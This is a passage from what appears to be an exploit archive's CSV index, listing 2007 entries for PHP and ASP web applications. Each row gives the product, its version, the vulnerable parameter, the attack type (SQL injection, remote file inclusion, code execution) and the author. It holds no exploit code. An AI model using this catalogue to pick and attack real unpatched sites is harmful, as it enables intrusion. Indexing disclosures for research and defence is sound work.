Super User",2007-04-01,rgod,php,webapps, -3623,exploits/php/webapps/3623.pl,"XOOPS Module eCal 2.24 - 'display.php' SQL Injection",2007-04-01,ajann,php,webapps, -3624,exploits/php/webapps/3624.txt,"BT-sondage 1.12 - 'gestion_sondage.php' Remote File Inclusion",2007-04-01,Crackers_Child,php,webapps, -3625,exploits/php/webapps/3625.pl,"XOOPS Module Tiny Event 1.01 - 'id' SQL Injection",2007-04-01,ajann,php,webapps, -3626,exploits/php/webapps/3626.pl,"XOOPS Module Kshop 1.17 - 'id' SQL Injection",2007-04-01,ajann,php,webapps, -3628,exploits/php/webapps/3628.txt,"CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion",2007-04-01,GoLd_M,php,webapps, -3629,exploits/php/webapps/3629.pl,"XOOPS Module Camportail 1.1 - 'camid' SQL Injection",2007-04-01,ajann,php,webapps, -3630,exploits/php/webapps/3630.html,"XOOPS Module debaser 0.92 - 'genre.php' Blind SQL Injection",2007-04-01,ajann,php,webapps, -3631,exploits/php/webapps/3631.txt,"FlexPHPNews 0.0.5 - 'newsid' SQL Injection",2007-04-01,Dj7xpl,php,webapps, -3632,exploits/php/webapps/3632.pl,"XOOPS Module myAlbum-P 2.0 - 'cid' SQL Injection",2007-04-01,ajann,php,webapps, -3633,exploits/php/webapps/3633.html,"XOOPS Module RM+Soft Gallery 1.0 - Blind SQL Injection",2007-04-01,ajann,php,webapps, -3638,exploits/php/webapps/3638.txt,"MapLab MS4W 2.2.1 - Remote File Inclusion",2007-04-02,ka0x,php,webapps, -3639,exploits/php/webapps/3639.txt,"PHP-Fusion Module topliste 1.0 - 'cid' SQL Injection",2007-04-02,"Mehmet Ince",php,webapps, -3640,exploits/php/webapps/3640.txt,"PHP-Fusion Module Arcade 1.0 - 'cid' SQL Injection",2007-04-02,"Mehmet Ince",php,webapps, -3641,exploits/php/webapps/3641.txt,"Really Simple PHP and Ajax (RSPA) 2007-03-23 - Remote File Inclusion",2007-04-02,"Hamid Ebadi",php,webapps, -3644,exploits/php/webapps/3644.pl,"XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection",2007-04-02,ajann,php,webapps, -3645,exploits/php/webapps/3645.html,"XOOPS Module XFsection 1.07 - 'articleId' Blind SQL Injection",2007-04-02,ajann,php,webapps, -3646,exploits/php/webapps/3646.pl,"XOOPS Module Zmagazine 1.0 - 'print.php' SQL Injection",2007-04-02,ajann,php,webapps, -3653,exploits/php/webapps/3653.php,"MyBulletinBoard (MyBB) 1.2.3 - Remote Code Execution",2007-04-03,DarkFig,php,webapps, -3655,exploits/php/webapps/3655.html,"XOOPS Module PopnupBlog 2.52 - 'postid' Blind SQL Injection",2007-04-03,ajann,php,webapps, -3656,exploits/php/webapps/3656.pl,"WordPress 2.1.2 - 'xmlrpc' SQL Injection",2007-04-03,"Sumit Siddharth",php,webapps, -3657,exploits/php/webapps/3657.txt,"MySpeach 3.0.7 - Local/Remote File Inclusion",2007-04-03,Xst3nZ,php,webapps, -3658,exploits/php/webapps/3658.html,"phpMyNewsletter 0.6.10 - 'customize.php' Remote File Inclusion",2007-04-04,frog-m@n,php,webapps, -3659,exploits/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusions",2007-04-04,kezzap66345,php,webapps, -3660,exploits/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - 'script_path' Remote File Inclusion",2007-04-04,bd0rk,php,webapps, -3663,exploits/php/webapps/3663.html,"XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection",2007-04-04,ajann,php,webapps, -3665,exploits/php/webapps/3665.html,"Mutant 0.9.2 - 'mutant_functions.php' Remote File Inclusion",2007-04-04,bd0rk,php,webapps, -3666,exploits/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - 'visit.php' SQL Injection",2007-04-04,ajann,php,webapps, -3667,exploits/php/webapps/3667.txt,"Sisplet CMS 05.10 - 'site_path' Remote File Inclusion",2007-04-05,kezzap66345,php,webapps, -3668,exploits/php/webapps/3668.txt,"CodeWand phpBrowse - 'site_path' Remote File Inclusion",2007-04-05,kezzap66345,php,webapps, -3669,exploits/php/webapps/3669.txt,"PHP-Generics 1.0.0 Beta - Multiple Remote File Inclusions",2007-04-05,bd0rk,php,webapps, -3670,exploits/php/webapps/3670.txt,"XOOPS Module WF-Links 1.03 - 'cid' SQL Injection",2007-04-05,ajann,php,webapps, -3671,exploits/php/webapps/3671.php,"phpMyNewsletter 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps, -3672,exploits/php/webapps/3672.pl,"XOOPS Module Jobs 2.4 - 'cid' SQL Injection",2007-04-05,ajann,php,webapps, -3673,exploits/php/webapps/3673.txt,"WebSPELL 4.01.02 - 'picture.php' File Disclosure",2007-04-05,Trex,php,webapps, -3676,exploits/php/webapps/3676.txt,"Beryo 2.0 - 'downloadpic.php?chemin' Remote File Disclosure",2007-04-06,GoLd_M,php,webapps, -3677,exploits/php/webapps/3677.txt,"cattaDoc 2.21 - 'download2.php?fn1' Remote File Disclosure",2007-04-06,GoLd_M,php,webapps, -3678,exploits/php/webapps/3678.php,"SmodBIP 1.06 - aktualnosci zoom SQL Injection",2007-04-06,Kacper,php,webapps, -3679,exploits/php/webapps/3679.php,"SmodCMS 2.10 - Slownik ssid SQL Injection",2007-04-06,Kacper,php,webapps, -3681,exploits/php/webapps/3681.txt,"Scorp Book 1.0 - 'smilies.php?config' Remote File Inclusion",2007-04-08,Dj7xpl,php,webapps, -3683,exploits/php/webapps/3683.pl,"PHP-Nuke Module eBoard 1.0.7 - GLOBALS[name] Local File Inclusion",2007-04-08,bd0rk,php,webapps, -3685,exploits/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software - Remote File Inclusion",2007-04-08,the_Edit0r,php,webapps, -3686,exploits/php/webapps/3686.txt,"WitShare 0.9 - 'index.php?menu' Local File Inclusion",2007-04-08,the_Edit0r,php,webapps, -3687,exploits/php/webapps/3687.txt,"ScarNews 1.2.1 - 'sn_admin_dir' Local File Inclusion",2007-04-08,BeyazKurt,php,webapps, -3689,exploits/php/webapps/3689.txt,"PcP-Guestbook 3.0 - 'lang' Local File Inclusion",2007-04-08,Dj7xpl,php,webapps, -3691,exploits/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - SQL Injection",2007-04-09,"h a c k e r _ X",php,webapps, -3694,exploits/php/webapps/3694.txt,"PHP121 Instant Messenger 2.2 - Local File Inclusion",2007-04-09,Dj7xpl,php,webapps, -3696,exploits/php/webapps/3696.txt,"Pathos CMS 0.92-2 - 'warn.php' Remote File Inclusion",2007-04-09,kezzap66345,php,webapps, -3697,exploits/php/webapps/3697.txt,"HIOX GUEST BOOK (HGB) 4.0 - Remote Code Execution",2007-04-10,Dj7xpl,php,webapps, -3699,exploits/php/webapps/3699.txt,"PHPGalleryScript 1.0 - 'init.gallery.php?include_class' Remote File Inclusion",2007-04-10,anonymous,php,webapps, -3700,exploits/php/webapps/3700.txt,"Weatimages 1.7.1 - ini[langpack] Remote File Inclusion",2007-04-10,Co-Sarper-Der,php,webapps, -3701,exploits/php/webapps/3701.txt,"Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps, -3702,exploits/php/webapps/3702.php,"InoutMailingListManager 3.1 - Remote Command Execution",2007-04-10,BlackHawk,php,webapps, -3703,exploits/php/webapps/3703.txt,"Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps, -3704,exploits/php/webapps/3704.txt,"pl-PHP Beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps, -3705,exploits/php/webapps/3705.txt,"SimpCMS 04.10.2007 - 'site' Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps, -3706,exploits/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery 2.5 Beta 2 - Remote File Inclusion",2007-04-11,iskorpitx,php,webapps, -3707,exploits/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a - 'absolute_path' Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps, -3710,exploits/php/webapps/3710.php,"PunBB 1.2.14 - Remote Code Execution",2007-04-11,DarkFig,php,webapps, -3711,exploits/php/webapps/3711.html,"CodeBreak 1.1.2 - 'codebreak.php' Remote File Inclusion",2007-04-11,"John Martinelli",php,webapps, -3712,exploits/php/webapps/3712.txt,"Mambo Module Weather - 'absolute_path' Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps, -3713,exploits/php/webapps/3713.txt,"Mambo Module Calendar (Agenda) 1.5.5 - Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps, -3714,exploits/php/webapps/3714.txt,"Joomla! Component mosmedia 1.0.8 - Remote File Inclusion",2007-04-11,GoLd_M,php,webapps, -3716,exploits/php/webapps/3716.pl,"mxBB Module MX Shotcast 1.0 RC2 - 'getinfo1.php' Remote File Inclusion",2007-04-12,bd0rk,php,webapps, -3717,exploits/php/webapps/3717.txt,"WebKalk2 1.9.0 - 'absolute_path' Remote File Inclusion",2007-04-12,GoLd_M,php,webapps, -3718,exploits/php/webapps/3718.txt,"RicarGBooK 1.2.1 - 'lang' Local File Inclusion",2007-04-12,Dj7xpl,php,webapps, -3719,exploits/php/webapps/3719.pl,"MyBulletinBoard (MyBB) 1.2.2 - 'CLIENT-IP' SQL Injection",2007-04-12,Elekt,php,webapps, -3721,exploits/php/webapps/3721.pl,"e107 0.7.8 - 'mailout.php' Authenticated Access Escalation",2007-04-12,Gammarays,php,webapps, -3722,exploits/php/webapps/3722.txt,"Expow 0.8 - 'autoindex.php?cfg_file' Remote File Inclusion",2007-04-12,mdx,php,webapps, -3723,exploits/php/webapps/3723.txt,"Request It 1.0b - 'index.php?id' Remote File Inclusion",2007-04-12,hackberry,php,webapps, -3725,exploits/php/webapps/3725.php,"Chatness 2.5.3 - '/options.php/save.php' Remote Code Execution",2007-04-12,Gammarays,php,webapps, -3729,exploits/php/webapps/3729.txt,"Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion",2007-04-13,Omni,php,webapps, -3731,exploits/php/webapps/3731.php,"Frogss CMS 0.7 - SQL Injection",2007-04-13,Kacper,php,webapps, -3732,exploits/php/webapps/3732.txt,"Garennes 0.6.1 - 'repertoire_config' Remote File Inclusion",2007-04-13,GoLd_M,php,webapps, -3733,exploits/php/webapps/3733.txt,"Pixaria Gallery 1.x - 'class.Smarty.php' Remote File Inclusion",2007-04-14,irvian,php,webapps, -3734,exploits/php/webapps/3734.txt,"Joomla! Component module autostand 1.0 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps, -3735,exploits/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps, -3736,exploits/php/webapps/3736.txt,"Joomla! / Mambo Component New Article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps, -3739,exploits/php/webapps/3739.php,"Papoo 3.02 - kontakt menuid SQL Injection",2007-04-15,Kacper,php,webapps, -3741,exploits/php/webapps/3741.txt,"CNStats 2.9 - 'who_r.php?bj' Remote File Inclusion",2007-04-15,irvian,php,webapps, -3742,exploits/php/webapps/3742.pl,"NMDeluxe 1.0.1 - 'footer.php?template' Local File Inclusion",2007-04-15,BeyazKurt,php,webapps, -3743,exploits/php/webapps/3743.txt,"Gallery 1.2.5 - 'GALLERY_BASEDIR' Multiple Remote File Inclusions",2007-04-15,GoLd_M,php,webapps, -3744,exploits/php/webapps/3744.txt,"audioCMS arash 0.1.4 - 'arashlib_dir' Remote File Inclusion",2007-04-15,GoLd_M,php,webapps, -3745,exploits/php/webapps/3745.txt,"Web Slider 0.6 - 'path' Remote File Inclusion",2007-04-15,GoLd_M,php,webapps, -3747,exploits/php/webapps/3747.txt,"openMairie 1.10 - '/scr/soustab.php' Local File Inclusion",2007-04-16,GoLd_M,php,webapps, -3748,exploits/php/webapps/3748.txt,"SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion",2007-04-16,irvian,php,webapps, -3749,exploits/php/webapps/3749.txt,"StoreFront for Gallery - 'GALLERY_BASEDIR' Remote File Inclusion",2007-04-16,"Alkomandoz Hacker",php,webapps, -3750,exploits/php/webapps/3750.txt,"xoops module tsdisplay4xoops 0.1 - Remote File Inclusion",2007-04-16,GoLd_M,php,webapps, -3751,exploits/php/webapps/3751.txt,"Anthologia 0.5.2 - 'index.php?ads_file' Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps, -3752,exploits/php/webapps/3752.txt,"AjPortal2Php - 'PagePrefix' Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",php,webapps, -3753,exploits/php/webapps/3753.txt,"Joomla! Component JoomlaPack 1.0.4a2 RE - 'CAltInstaller.php' Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps, -3754,exploits/php/webapps/3754.pl,"MiniGal b13 - Remote Code Execution",2007-04-17,Dj7xpl,php,webapps, -3756,exploits/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full - Remote File Inclusion",2007-04-17,Dj7xpl,php,webapps, -3758,exploits/php/webapps/3758.php,"ShoutPro 1.5.2 - 'shout.php' Remote Code Injection",2007-04-17,Gammarays,php,webapps, -3759,exploits/php/webapps/3759.pl,"Joomla! Component Template Be2004-2 - 'index.php' Remote File Inclusion",2007-04-17,"Cold Zero",php,webapps, -3760,exploits/php/webapps/3760.txt,"jGallery 1.3 - 'index.php' Remote File Inclusion",2007-04-18,Dj7xpl,php,webapps, -3761,exploits/php/webapps/3761.txt,"Mozzers SubSystem final - 'subs.php' Remote Code Execution",2007-04-18,Dj7xpl,php,webapps, -3762,exploits/php/webapps/3762.html,"AimStats 3.2 - 'process.php?update' Remote Code Execution",2007-04-18,Dj7xpl,php,webapps, -3763,exploits/php/webapps/3763.txt,"Rezervi 0.9 - 'root' Remote File Inclusion",2007-04-18,GoLd_M,php,webapps, -3764,exploits/php/webapps/3764.txt,"Zomplog 3.8 - 'force_download.php' Remote File Disclosure",2007-04-18,Dj7xpl,php,webapps, -3765,exploits/php/webapps/3765.txt,"opensurveypilot 1.2.1 - Remote File Inclusion",2007-04-18,"Alkomandoz Hacker",php,webapps, -3766,exploits/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 - Remote File Inclusion",2007-04-19,bd0rk,php,webapps, -3767,exploits/asp/webapps/3767.txt,"CreaDirectory 1.2 - 'error.asp?id' SQL Injection",2007-04-19,CyberGhost,asp,webapps, -3771,exploits/php/webapps/3771.txt,"Supasite 1.23b - Multiple Remote File Inclusions",2007-04-21,GoLd_M,php,webapps, -3773,exploits/php/webapps/3773.txt,"JChit counter 1.0.0 - 'imgsrv.php?ac' Remote File Disclosure",2007-04-22,Dj7xpl,php,webapps, -3774,exploits/php/webapps/3774.txt,"PHP-Ring Webring System 0.9 - SQL Injection",2007-04-22,Dj7xpl,php,webapps, -3775,exploits/php/webapps/3775.txt,"Maran PHP Forum - 'forum_write.php' Remote Code Execution",2007-04-22,Dj7xpl,php,webapps, -3778,exploits/php/webapps/3778.txt,"WEBInsta FM 0.1.4 - 'login.php' absolute_path Remote File Inclusion",2007-04-23,g00ns,php,webapps, -3780,exploits/php/webapps/3780.pl,"MyBulletinBoard (MyBB) 1.2.5 - 'calendar.php' Blind SQL Injection",2007-04-23,0x86,php,webapps, -3781,exploits/php/webapps/3781.txt,"Joomla! 1.5.0 Beta - 'pcltar.php' Remote File Inclusion",2007-04-23,Omid,php,webapps, -3783,exploits/php/webapps/3783.txt,"Pagode 0.5.8 - 'navigator_ok.php?asolute' Remote File Disclosure",2007-04-23,GoLd_M,php,webapps, -3785,exploits/php/webapps/3785.txt,"Post REvolution 0.7.0 RC 2 - 'dir' Remote File Inclusion",2007-04-23,InyeXion,php,webapps, -3786,exploits/php/webapps/3786.txt,"GPB Bulletin Board - Multiple Remote File Inclusions",2007-04-24,"ThE TiGeR",php,webapps, -3794,exploits/php/webapps/3794.txt,"USP FOSS Distribution 1.01 - 'dnld' Remote File Disclosure",2007-04-24,GoLd_M,php,webapps, -3795,exploits/php/webapps/3795.txt,"Advanced Webhost Billing System (AWBS) 2.4.0 - 'cart2.php' Remote File Inclusion",2007-04-24,DamaR,php,webapps, -3796,exploits/php/webapps/3796.html,"wavewoo 0.1.1 - 'loading.php?path_include' Remote File Inclusion",2007-04-24,kezzap66345,php,webapps, -3799,exploits/php/webapps/3799.txt,"JulmaCMS 1.4 - 'file.php' Remote File Disclosure",2007-04-25,GoLd_M,php,webapps, -3800,exploits/php/webapps/3800.txt,"Ext 1.0 - 'feed-proxy.php?feed' Remote File Disclosure",2007-04-25,"Alkomandoz Hacker",php,webapps, -3802,exploits/php/webapps/3802.txt,"PHPBandManager 0.8 - 'index.php?pg' Remote File Inclusion",2007-04-26,koray,php,webapps, -3803,exploits/php/webapps/3803.txt,"PHPOracleView - 'include_all.inc.php?page_dir' Remote File Inclusion",2007-04-26,"Alkomandoz Hacker",php,webapps, -3805,exploits/php/webapps/3805.txt,"Firefly 1.1.01 - 'doc_root' Remote File Inclusion",2007-04-26,"Alkomandoz Hacker",php,webapps, -3806,exploits/php/webapps/3806.txt,"EsForum 3.0 - 'forum.php?idsalon' SQL Injection",2007-04-26,"ilker Kandemir",php,webapps, -3809,exploits/php/webapps/3809.txt,"burnCMS 0.2 - 'root' Remote File Inclusion",2007-04-27,GoLd_M,php,webapps, -3813,exploits/php/webapps/3813.txt,"PostNuke pnFlashGames Module 1.5 - SQL Injection",2007-04-28,"Mehmet Ince",php,webapps, -3814,exploits/php/webapps/3814.txt,"WordPress Plugin mygallery 1.4b4 - Remote File Inclusion",2007-04-29,GoLd_M,php,webapps, -3816,exploits/php/webapps/3816.php,"TCExam 4.0.011 - 'SessionUserLang' Shell Injection",2007-04-29,rgod,php,webapps, -3817,exploits/php/webapps/3817.txt,"Imageview 5.3 - 'fileview.php?album' Local File Inclusion",2007-04-29,DNX,php,webapps, -3818,exploits/php/webapps/3818.html,"The Merchant 2.2.0 - 'index.php?show' Remote File Inclusion",2007-04-29,kezzap66345,php,webapps, -3820,exploits/php/webapps/3820.php,"psipuss 1.0 - 'editusers.php' Remote Change Admin Password",2007-04-30,Dj7xpl,php,webapps, -3824,exploits/php/webapps/3824.txt,"WordPress Plugin wp-Table 1.43 - 'inc_dir' Remote File Inclusion",2007-05-01,K-159,php,webapps, -3825,exploits/php/webapps/3825.txt,"WordPress Plugin wordTube 1.43 - 'wpPATH' Remote File Inclusion",2007-05-01,K-159,php,webapps, -3827,exploits/php/webapps/3827.txt,"Sendcard 3.4.1 - 'sendcard.php?form' Local File Inclusion",2007-05-01,ettee,php,webapps, -3828,exploits/php/webapps/3828.txt,"WordPress Plugin myflash 1.00 - 'wppath' Remote File Inclusion",2007-05-01,Crackers_Child,php,webapps, -3831,exploits/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - 'download.asp' File Disclosure",2007-05-02,Dj7xpl,asp,webapps, -3832,exploits/php/webapps/3832.txt,"1024 CMS 0.7 - 'download.php' Remote File Disclosure",2007-05-02,Dj7xpl,php,webapps, -3833,exploits/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion",2007-05-02,bd0rk,php,webapps, -3834,exploits/php/webapps/3834.php,"YaPiG 0.95b - Remote Code Execution",2007-05-02,Dj7xpl,php,webapps, -3835,exploits/php/webapps/3835.txt,"PostNuke Module v4bJournal - SQL Injection",2007-05-02,"Ali Abbasi",php,webapps, -3837,exploits/php/webapps/3837.txt,"phpChess Community Edition 2.0 - Multiple Remote File Inclusions",2007-05-03,GoLd_M,php,webapps, -3838,exploits/php/webapps/3838.txt,"Open Translation Engine (OTE) 0.7.8 - 'header.php?ote_home' Remote File Inclusion",2007-05-03,GoLd_M,php,webapps, -3839,exploits/php/webapps/3839.txt,"PHP Coupon Script 3.0 - 'bus' SQL Injection",2007-05-03,"Mehmet Ince",php,webapps, -3840,exploits/php/webapps/3840.txt,"Pre Classifieds Listings 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps, -3841,exploits/php/webapps/3841.txt,"Pre News Manager 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps, -3842,exploits/php/webapps/3842.txt,"Pre Shopping Mall 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps, -3843,exploits/php/webapps/3843.txt,"Censura 1.15.04 - 'censura.php?vendorid' SQL Injection",2007-05-03,"Mehmet Ince",php,webapps, -3846,exploits/php/webapps/3846.txt,"E-GADS! 2.2.6 - 'common.php?locale' Remote File Inclusion",2007-05-04,kezzap66345,php,webapps, -3847,exploits/php/webapps/3847.txt,"Versado CMS 1.07 - 'ajax_listado.php?urlModulo' Remote File Inclusion",2007-05-04,kezzap66345,php,webapps, -3848,exploits/php/webapps/3848.txt,"workbench 0.11 - 'header.php?path' Remote File Inclusion",2007-05-04,kezzap66345,php,webapps, -3849,exploits/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",php,webapps, -3850,exploits/php/webapps/3850.php,"RunCMS 1.5.2 - 'debug_show.php' SQL Injection",2007-05-04,rgod,php,webapps, -3852,exploits/php/webapps/3852.txt,"PMECMS 1.0 - config[pathMod] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps, -3853,exploits/php/webapps/3853.txt,"Persism CMS 0.9.2 - system[path] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps, -3854,exploits/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a - 'right_file' Remote File Inclusion",2007-05-04,kezzap66345,php,webapps, -3855,exploits/php/webapps/3855.php,"Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (2)",2007-05-04,Gu1ll4um3r0m41n,php,webapps, -3857,exploits/php/webapps/3857.txt,"vm Watermark for Gallery 0.4.1 - Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps, -3858,exploits/php/webapps/3858.php,"Nuked-klaN 1.7.6 - Remote Code Execution",2007-05-05,DarkFig,php,webapps, -3859,exploits/php/webapps/3859.txt,"Archangel Weblog 0.90.02 - Local File Inclusion / Authentication Bypass",2007-05-05,Dj7xpl,php,webapps, -3860,exploits/php/webapps/3860.txt,"PHPtree 1.3 - 'cms2.php?s_dir' Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps, -3861,exploits/php/webapps/3861.txt,"NoAh 0.9 pre 1.2 - 'mfa_theme.php' Remote File Inclusion",2007-05-06,kezzap66345,php,webapps, -3862,exploits/php/webapps/3862.txt,"XOOPS Module wfquotes 1.0 - SQL Injection",2007-05-06,"Mehmet Ince",php,webapps, -3863,exploits/php/webapps/3863.txt,"Wikivi5 - 'show.php?sous_rep' Remote File Inclusion",2007-05-06,GoLd_M,php,webapps, -3864,exploits/php/webapps/3864.txt,"Friendly 1.0d1 - 'friendly_path' Remote File Inclusion",2007-05-06,GoLd_M,php,webapps, -3865,exploits/php/webapps/3865.txt,"Tropicalm Crowell Resource 4.5.2 - 'RESPATH' Remote File Inclusion",2007-05-07,kezzap66345,php,webapps, -3867,exploits/php/webapps/3867.pl,"ACGVAnnu 1.3 - 'acgv.php?rubrik' Local File Inclusion",2007-05-07,BeyazKurt,php,webapps, -3868,exploits/php/webapps/3868.txt,"DynamicPAD 1.02.18 - 'HomeDir' Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps, -3869,exploits/php/webapps/3869.txt,"Berylium2 2003-08-18 - 'beryliumroot' Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps, -3870,exploits/php/webapps/3870.txt,"LaVague 0.3 - 'printbar.php?views_path' Remote File Inclusion",2007-05-08,kezzap66345,php,webapps, -3874,exploits/php/webapps/3874.txt,"CGX 20050314 - 'pathCGX' Remote File Inclusion",2007-05-08,GoLd_M,php,webapps, -3875,exploits/php/webapps/3875.txt,"PHPLojaFacil 0.1.5 - 'path_local' Remote File Inclusion",2007-05-08,GoLd_M,php,webapps, -3876,exploits/php/webapps/3876.txt,"GNUEDU 1.3b2 - Multiple Remote File Inclusions",2007-05-08,GoLd_M,php,webapps, -3878,exploits/php/webapps/3878.txt,"Miplex2 - 'SmartyFU.class.php' Remote File Inclusion",2007-05-08,"ThE TiGeR",php,webapps, -3879,exploits/php/webapps/3879.html,"phpMyPortal 3.0.0 RC3 - GLOBALS[CHEMINMODULES] Remote File Inclusion",2007-05-09,GoLd_M,php,webapps, -3884,exploits/php/webapps/3884.txt,"aForum 1.32 - 'CommonAbsDir' Remote File Inclusion",2007-05-09,"ThE TiGeR",php,webapps, -3885,exploits/php/webapps/3885.txt,"telltarget 1.3.3 - 'tt_docroot' Remote File Inclusion",2007-05-09,GoLd_M,php,webapps, -3886,exploits/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - 'print.php?news_id' SQL Injection",2007-05-09,Silentz,php,webapps, -3887,exploits/php/webapps/3887.pl,"TutorialCMS 1.00 - 'search.php?search' SQL Injection",2007-05-09,Silentz,php,webapps, -3894,exploits/php/webapps/3894.txt,"Original 0.11 - 'config.inc.php?x[1]' Remote File Inclusion",2007-05-10,GoLd_M,php,webapps, -3895,exploits/php/webapps/3895.txt,"Thyme Calendar 1.3 - SQL Injection",2007-05-10,warlord,php,webapps, -3896,exploits/php/webapps/3896.pl,"TaskDriver 1.2 - Authentication Bypass / SQL Injection",2007-05-10,Silentz,php,webapps, -3900,exploits/php/webapps/3900.php,"Snaps! Gallery 1.4.4 - Remote User Pass Change",2007-05-11,Dj7xpl,php,webapps, -3901,exploits/php/webapps/3901.txt,"maGAZIn 2.0 - 'PHPThumb.php?src' Remote File Disclosure",2007-05-11,Dj7xpl,php,webapps, -3902,exploits/php/webapps/3902.txt,"R2K Gallery 1.7 - 'galeria.php?lang2' Local File Inclusion",2007-05-11,Dj7xpl,php,webapps, -3903,exploits/php/webapps/3903.php,"Monalbum 0.8.7 - Remote Code Execution",2007-05-11,Dj7xpl,php,webapps, -3905,exploits/asp/webapps/3905.txt,"W1L3D4 philboard 0.2 - 'W1L3D4_bolum.asp' SQL Injection",2007-05-11,gsy,asp,webapps, -3906,exploits/php/webapps/3906.html,"PHP FirstPost 0.1 - 'block.php?Include' Remote File Inclusion",2007-05-12,Dj7xpl,php,webapps, -3907,exploits/php/webapps/3907.txt,"iG Shop 1.4 - 'page.php' SQL Injection",2007-05-12,gsy,php,webapps, -3908,exploits/php/webapps/3908.txt,"YAAP 1.5 - '__autoload()' Remote File Inclusion",2007-05-12,3l3ctric-Cracker,php,webapps, -3909,exploits/php/webapps/3909.txt,"Beacon 0.2.0 - 'splash.lang.php' Remote File Inclusion",2007-05-12,"ThE TiGeR",php,webapps, -3911,exploits/php/webapps/3911.txt,"EfesTECH Haber 5.0 - 'id' SQL Injection",2007-05-14,CyberGhost,php,webapps, -3914,exploits/asp/webapps/3914.txt,"BlogMe 3.0 - 'archshow.asp?var' SQL Injection",2007-05-13,gsy,asp,webapps, -3915,exploits/php/webapps/3915.txt,"CJG EXPLORER PRO 3.2 - 'g_pcltar_lib_dir' Remote File Inclusion",2007-05-13,Mogatil,php,webapps, -3918,exploits/php/webapps/3918.txt,"phpAtm 1.30 - 'downloadfile' Remote File Disclosure",2007-05-13,Ali.Mohajem,php,webapps, -3919,exploits/php/webapps/3919.txt,"NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps, -3920,exploits/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - 'newsadmin.php?action' Remote File Inclusion",2007-05-14,Mogatil,php,webapps, -3923,exploits/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps, -3924,exploits/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps, -3928,exploits/php/webapps/3928.txt,"Achievo 1.1.0 - 'config_atkroot' Remote File Inclusion",2007-05-15,Katatafish,php,webapps, -3931,exploits/php/webapps/3931.html,"XOOPS Module resmanager 1.21 - Blind SQL Injection",2007-05-15,ajann,php,webapps, -3932,exploits/php/webapps/3932.pl,"XOOPS Module Glossarie 1.7 - 'sid' SQL Injection",2007-05-15,ajann,php,webapps, -3933,exploits/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 - 'index.php' SQL Injection",2007-05-15,ajann,php,webapps, -3935,exploits/php/webapps/3935.txt,"Glossword 1.8.1 - 'custom_vars.php' Remote File Inclusion",2007-05-16,BeyazKurt,php,webapps, -3936,exploits/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - 'tr' Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps, -3941,exploits/php/webapps/3941.txt,"PHPGlossar 0.8 - 'format_menue' Remote File Inclusion",2007-05-16,kezzap66345,php,webapps, -3942,exploits/php/webapps/3942.pl,"SimpNews 2.40.01 - 'newnr' SQL Injection",2007-05-16,Silentz,php,webapps, -3943,exploits/php/webapps/3943.pl,"FAQEngine 4.16.03 - 'question.php?questionref' SQL Injection",2007-05-16,Silentz,php,webapps, -3944,exploits/php/webapps/3944.txt,"Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps, -3946,exploits/php/webapps/3946.txt,"GeekLog 2.x - 'ImageImageMagick.php' Remote File Inclusion",2007-05-17,diesl0w,php,webapps, -3947,exploits/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusions",2007-05-17,"Alkomandoz Hacker",php,webapps, -3948,exploits/php/webapps/3948.txt,"Libstats 1.0.3 - 'template_csv.php' Remote File 